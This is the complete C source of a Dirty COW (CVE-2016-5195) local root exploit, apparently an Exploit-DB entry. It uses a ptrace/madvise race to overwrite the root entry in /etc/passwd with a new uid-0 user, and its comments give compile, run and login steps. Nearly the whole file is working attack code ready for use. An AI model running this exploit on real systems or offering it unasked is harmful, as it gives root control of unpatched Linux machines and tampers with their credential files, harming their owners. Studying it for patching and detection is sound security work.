// EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback

1. // EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
2. //
3. // This exploit uses the pokemon exploit of the dirtycow vulnerability
4. // as a base and automatically generates a new passwd line.
5. // The user will be prompted for the new password when the binary is run.
6. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
7. // and overwrites the root account with the generated line.
8. // After running the exploit you should be able to login with the newly
9. // created user.
10. //
11. // To use this exploit modify the user values according to your needs.
12. // The default is "firefart".
13. //
14. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
15. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
16. //
17. // Compile with:
18. // gcc -pthread dirty.c -o dirty -lcrypt
19. //
20. // Then run the newly create binary by either doing:
21. // "./dirty" or "./dirty my-new-password"
22. //
23. // Afterwards, you can either "su firefart" or "ssh firefart@..."
24. //
25. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
26. // mv /tmp/passwd.bak /etc/passwd
27. //
28. // Exploit adopted by Christian "FireFart" Mehlmauer
29. // https://firefart.at
30. //
31.  
32. #include <fcntl.h>
33. #include <pthread.h>
34. #include <string.h>
35. #include <stdio.h>
36. #include <stdint.h>
37. #include <sys/mman.h>
38. #include <sys/types.h>
39. #include <sys/stat.h>
40. #include <sys/wait.h>
41. #include <sys/ptrace.h>
42. #include <stdlib.h>
43. #include <unistd.h>
44. #include <crypt.h>
45.  
46. const char *filename = "/etc/passwd";
47. const char *backup_filename = "/tmp/passwd.bak";
48. const char *salt = "firefart";
49.  
50. int f;
51. void *map;
52. pid_t pid;
53. pthread_t pth;
54. struct stat st;
55.  
56. struct Userinfo {
57. char *username;
58. char *hash;
59. int user_id;
60. int group_id;
61. char *info;
62. char *home_dir;
63. char *shell;
64. };
65.  
66. char *generate_password_hash(char *plaintext_pw) {
67. return crypt(plaintext_pw, salt);
68. }
69.  
70. char *generate_passwd_line(struct Userinfo u) {
71. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
72. int size = snprintf(NULL, 0, format, u.username, u.hash,
73. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
74. char *ret = malloc(size + 1);
75. sprintf(ret, format, u.username, u.hash, u.user_id,
76. u.group_id, u.info, u.home_dir, u.shell);
77. return ret;
78. }
79.  
80. void *madviseThread(void *arg) {
81. int i, c = 0;
82. for(i = 0; i < 200000000; i++) {
83. c += madvise(map, 100, MADV_DONTNEED);
84. }
85. printf("madvise %d\n\n", c);
86. }
87.  
88. int copy_file(const char *from, const char *to) {
89. // check if target file already exists
90. if(access(to, F_OK) != -1) {
91. printf("File %s already exists! Please delete it and run again\n",
92. to);
93. return -1;
94. }
95.  
96. char ch;
97. FILE *source, *target;
98.  
99. source = fopen(from, "r");
100. if(source == NULL) {
101. return -1;
102. }
103. target = fopen(to, "w");
104. if(target == NULL) {
105. fclose(source);
106. return -1;
107. }
108.  
109. while((ch = fgetc(source)) != EOF) {
110. fputc(ch, target);
111. }
112.  
113. printf("%s successfully backed up to %s\n",
114. from, to);
115.  
116. fclose(source);
117. fclose(target);
118.  
119. return 0;
120. }
121.  
122. int main(int argc, char *argv[])
123. {
124. // backup file
125. int ret = copy_file(filename, backup_filename);
126. if (ret != 0) {
127. exit(ret);
128. }
129.  
130. struct Userinfo user;
131. // set values, change as needed
132. user.username = "firefart";
133. user.user_id = 0;
134. user.group_id = 0;
135. user.info = "pwned";
136. user.home_dir = "/root";
137. user.shell = "/bin/bash";
138.  
139. char *plaintext_pw;
140.  
141. if (argc >= 2) {
142. plaintext_pw = argv[1];
143. printf("Please enter the new password: %s\n", plaintext_pw);
144. } else {
145. plaintext_pw = getpass("Please enter the new password: ");
146. }
147.  
148. user.hash = generate_password_hash(plaintext_pw);
149. char *complete_passwd_line = generate_passwd_line(user);
150. printf("Complete line:\n%s\n", complete_passwd_line);
151.  
152. f = open(filename, O_RDONLY);
153. fstat(f, &st);
154. map = mmap(NULL,
155. st.st_size + sizeof(long),
156. PROT_READ,
157. MAP_PRIVATE,
158. f,
159. 0);
160. printf("mmap: %lx\n",(unsigned long)map);
161. pid = fork();
162. if(pid) {
163. waitpid(pid, NULL, 0);
164. int u, i, o, c = 0;
165. int l=strlen(complete_passwd_line);
166. for(i = 0; i < 10000/l; i++) {
167. for(o = 0; o < l; o++) {
168. for(u = 0; u < 10000; u++) {
169. c += ptrace(PTRACE_POKETEXT,
170. pid,
171. map + o,
172. *((long*)(complete_passwd_line + o)));
173. }
174. }
175. }
176. printf("ptrace %d\n",c);
177. }
178. else {
179. pthread_create(&pth,
180. NULL,
181. madviseThread,
182. NULL);
183. ptrace(PTRACE_TRACEME);
184. kill(getpid(), SIGSTOP);
185. pthread_join(pth,NULL);
186. }
187.  
188. printf("Done! Check %s to see if the new user was created\n", filename);
189. printf("You can log in with username %s and password %s.\n\n",
190. user.username, plaintext_pw);
191. printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
192. filename, backup_filename);
193. return 0;
194. }